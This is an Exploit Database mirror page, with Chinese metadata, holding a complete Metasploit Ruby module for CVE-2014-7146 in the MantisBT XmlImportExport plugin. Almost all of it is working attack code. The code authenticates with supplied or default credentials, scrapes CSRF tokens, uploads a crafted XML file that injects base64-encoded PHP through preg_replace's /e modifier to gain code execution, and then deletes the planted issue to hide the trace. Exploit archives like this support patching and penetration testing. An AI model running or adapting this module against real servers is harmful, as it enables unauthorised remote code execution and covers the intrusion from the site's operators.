Mantis Bug Tracker 1.2.0a3 < 1.2.17 XmlImportExport Plugin - PHP Code Injection (Metasploit) (2)

• Exploit Database
• 11 阅读

• 作者： Metasploit
  日期： 2014-11-18
• 类别：

  • remote
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/35283/

• ##
  # This module requires Metasploit: http://metasploit.com/download
  # Current source: https://github.com/rapid7/metasploit-framework
  ##
  
  require 'msf/core'
  
  class Metasploit3 < Msf::Exploit::Remote
  Rank = GreatRanking
  
  include Msf::Exploit::Remote::HttpClient
  
  def initialize(info = {})
  super(update_info(info,
  'Name' => 'MantisBT XmlImportExport Plugin PHP Code Injection Vulnerability',
  'Description'=> %q{
  This module exploits a post-auth vulnerability found in MantisBT versions 1.2.0a3 up to 1.2.17 when the Import/Export plugin is installed.
  The vulnerable code exists on plugins/XmlImportExport/ImportXml.php, which receives user input through the "description" field and the "issuelink" attribute of an uploaded XML file and passes to preg_replace() function with the /e modifier.
  This allows a remote authenticated attacker to execute arbitrary PHP code on the remote machine.
  },
  'License'=> MSF_LICENSE,
  'Author' =>
  [
  'Egidio Romano', # discovery http://karmainsecurity.com
  'Juan Escobar <eng.jescobar[at]gmail.com>', # module development @itsecurityco
  ],
  'References' =>
  [
  ['CVE', '2014-7146']
  ],
  'Platform' => 'php',
  'Arch' => ARCH_PHP,
  'Targets'=> [['Generic (PHP Payload)', {}]],
  'DisclosureDate' => 'Nov 8 2014',
  'DefaultTarget'=> 0))
  
  register_options(
  [
  OptString.new('USERNAME', [ true, 'Username to authenticate as', 'administrator']),
  OptString.new('PASSWORD', [ true, 'Pasword to authenticate as', 'root']),
  OptString.new('TARGETURI', [ true, 'Base directory path', '/'])
  ], self.class)
  end
  
  def check
  res = exec_php('phpinfo(); die();', true)
  
  if res && res.body =~ /This program makes use of the Zend/
  return Exploit::CheckCode::Vulnerable
  else
  return Exploit::CheckCode::Unknown
  end
  end
  
  def do_login()
  print_status('Checking access to MantisBT...')
  res = send_request_cgi({
  'method' => 'GET',
  'uri'=> normalize_uri(target_uri.path, 'login_page.php'),
  'vars_get' => {
  'return'=> normalize_uri(target_uri.path, 'plugin.php?page=XmlImportExport/import')
  }
  })
  
  fail_with(Failure::NoAccess, 'Error accessing MantisBT') unless res && res.code == 200
  
  session_cookie = res.get_cookies
  
  print_status('Logging in...')
  res = send_request_cgi({
  'method'=> 'POST',
  'uri' => normalize_uri(target_uri.path, 'login.php'),
  'cookie'=> session_cookie,
  'vars_post' => {
  'return'=> normalize_uri(target_uri.path, 'plugin.php?page=XmlImportExport/import'),
  'username' => datastore['username'],
  'password' => datastore['password'],
  'secure_session' => 'on'
  }
  })
  
  
  fail_with(Failure::NoAccess, 'Login failed') unless res && res.code == 302
  
  fail_with(Failure::NoAccess, 'Wrong credentials') unless res.redirection.to_s !~ /login_page.php/
  
  "#{session_cookie} #{res.get_cookies}"
  end
  
  def upload_xml(payload_b64, rand_text, cookies, is_check)
  
  if is_check
  timeout = 20
  else
  timeout = 3
  end
  
  rand_num = Rex::Text.rand_text_numeric(1, 9)
  
  print_status('Checking XmlImportExport plugin...')
  res = send_request_cgi({
  'method' => 'GET',
  'uri'=> normalize_uri(target_uri.path, 'plugin.php'),
  'cookie' => cookies,
  'vars_get' => {
  'page' => 'XmlImportExport/import'
  }
  })
  
  unless res && res.code == 200
  print_error('Error trying to access XmlImportExport/import page...')
  return false
  end
  
  # Retrieving CSRF token
  if res.body =~ /name="plugin_xml_import_action_token" value="(.*)"/
  csrf_token = Regexp.last_match[1]
  else
  print_error('Error trying to read CSRF token')
  return false
  end
  
  # Retrieving default project id
  if res.body =~ /name="project_id" value="([0-9]+)"/
  project_id = Regexp.last_match[1]
  else
  print_error('Error trying to read project id')
  return false
  end
  
  # Retrieving default category id
  if res.body =~ /name="defaultcategory">[.|\r|\r\n]*<option value="([0-9])" selected="selected" >\(select\)<\/option><option value="1">\[All Projects\] (.*)<\/option>/
  category_id = Regexp.last_match[1]
  category_name = Regexp.last_match[2]
  else
  print_error('Error trying to read default category')
  return false
  end
  
  # Retrieving default max file size
  if res.body =~ /name="max_file_size" value="([0-9]+)"/
  max_file_size = Regexp.last_match[1]
  else
  print_error('Error trying to read default max file size')
  return false
  end
  
  # Retrieving default step
  if res.body =~ /name="step" value="([0-9]+)"/
  step = Regexp.last_match[1]
  else
  print_error('Error trying to read default step value')
  return false
  end
  
  xml_file = %Q|
  <mantis version="1.2.17" urlbase="http://localhost/" issuelink="${eval(base64_decode(#{ payload_b64 }))}}" notelink="~" format="1">
  <issue>
  <id>#{ rand_num }</id>
  <project id="#{ project_id }">#{ rand_text }</project>
  <reporter id="#{ rand_num }">#{ rand_text }</reporter>
  <priority id="30">normal</priority>
  <severity id="50">minor</severity>
  <reproducibility id="70">have not tried</reproducibility>
  <status id="#{ rand_num }">new</status>
  <resolution id="#{ rand_num }">open</resolution>
  <projection id="#{ rand_num }">none</projection>
  <category id="#{ category_id }">#{ category_name }</category>
  <date_submitted>1415492267</date_submitted>
  <last_updated>1415507582</last_updated>
  <eta id="#{ rand_num }">none</eta>
  <view_state id="#{ rand_num }">public</view_state>
  <summary>#{ rand_text }</summary>
  <due_date>1</due_date>
  <description>{${eval(base64_decode(#{ payload_b64 }))}}1</description>
  </issue>
  </mantis>
  |
  
  data = Rex::MIME::Message.new
  data.add_part("#{ csrf_token }", nil, nil, "form-data; name=\"plugin_xml_import_action_token\"")
  data.add_part("#{ project_id }", nil, nil, "form-data; name=\"project_id\"")
  data.add_part("#{ max_file_size }", nil, nil, "form-data; name=\"max_file_size\"")
  data.add_part("#{ step }", nil, nil, "form-data; name=\"step\"")
  data.add_part(xml_file, "text/xml", "UTF-8", "form-data; name=\"file\"; filename=\"#{ rand_text }.xml\"")
  data.add_part("renumber", nil, nil, "form-data; name=\"strategy\"")
  data.add_part("link", nil, nil, "form-data; name=\"fallback\"")
  data.add_part("on", nil, nil, "form-data; name=\"keepcategory\"")
  data.add_part("#{ category_id }", nil, nil, "form-data; name=\"defaultcategory\"")
  data_post = data.to_s
  
  print_status('Sending payload...')
  return send_request_cgi({
  'method'=> 'POST',
  'uri' => normalize_uri(target_uri.path, 'plugin.php?page=XmlImportExport/import_action'),
  'cookie' => cookies,
  'ctype' => "multipart/form-data; boundary=#{ data.bound }",
  'data'=> data_post
  }, timeout)
  end
  
  def exec_php(php_code, is_check = false)
  
  # remove comments, line breaks and spaces of php_code
  payload_clean = php_code.gsub(/(\s+)|(#.*)/, '')
  
  # clean b64 payload
  while Rex::Text.encode_base64(payload_clean) =~ /=/
  payload_clean = "#{ payload_clean } "
  end
  payload_b64 = Rex::Text.encode_base64(payload_clean)
  
  rand_text = Rex::Text.rand_text_alpha(5, 8)
  
  cookies = do_login()
  
  res_payload = upload_xml(payload_b64, rand_text, cookies, is_check)
  
  # When a meterpreter session is active, communication with the application is lost.
  # Must login again in order to recover the communication. Thanks to @FireFart for figure out how to fix it.
  cookies = do_login()
  
  print_status("Deleting issue (#{ rand_text })...")
  res = send_request_cgi({
  'method' => 'GET',
  'uri'=> normalize_uri(target_uri.path, 'my_view_page.php'),
  'cookie' => cookies
  })
  
  unless res && res.code == 200
  print_error('Error trying to access My View page')
  return false
  end
  
  if res.body =~ /title="\[@[0-9]+@\] #{ rand_text }">0+([0-9]+)<\/a>/
  issue_id = Regexp.last_match[1]
   else
  print_error('Error trying to retrieve issue id')
  return false
  end
  
  res = send_request_cgi({
  'method' => 'GET',
  'uri'=> normalize_uri(target_uri.path, 'bug_actiongroup_page.php'),
  'cookie' => cookies,
  'vars_get' => {
  'bug_arr[]' => issue_id,
  'action' => 'DELETE',
  },
  })
  
  if res && res.body =~ /name="bug_actiongroup_DELETE_token" value="(.*)"\/>/
  csrf_token = Regexp.last_match[1]
  else
  print_error('Error trying to retrieve CSRF token')
  return false
  end
  
  res = send_request_cgi({
  'method' => 'POST',
  'uri'=> normalize_uri(target_uri.path, 'bug_actiongroup.php'),
  'cookie' => cookies,
  'vars_post' => {
  'bug_actiongroup_DELETE_token' => csrf_token,
  'bug_arr[]' => issue_id,
  'action' => 'DELETE',
  },
  })
  
  if res && res.code == 302 || res.body !~ /Issue #{ issue_id } not found/
  print_status("Issue number (#{ issue_id }) removed")
  else
  print_error("Removing issue number (#{ issue_id }) has failed")
  return false
  end
  
  # if check return the response
  if is_check
  return res_payload
  else
  return true
  end
  end
  
  def exploit
  unless exec_php(payload.encoded)
  fail_with(Failure::Unknown, 'Exploit failed, aborting.')
  end
  end
  end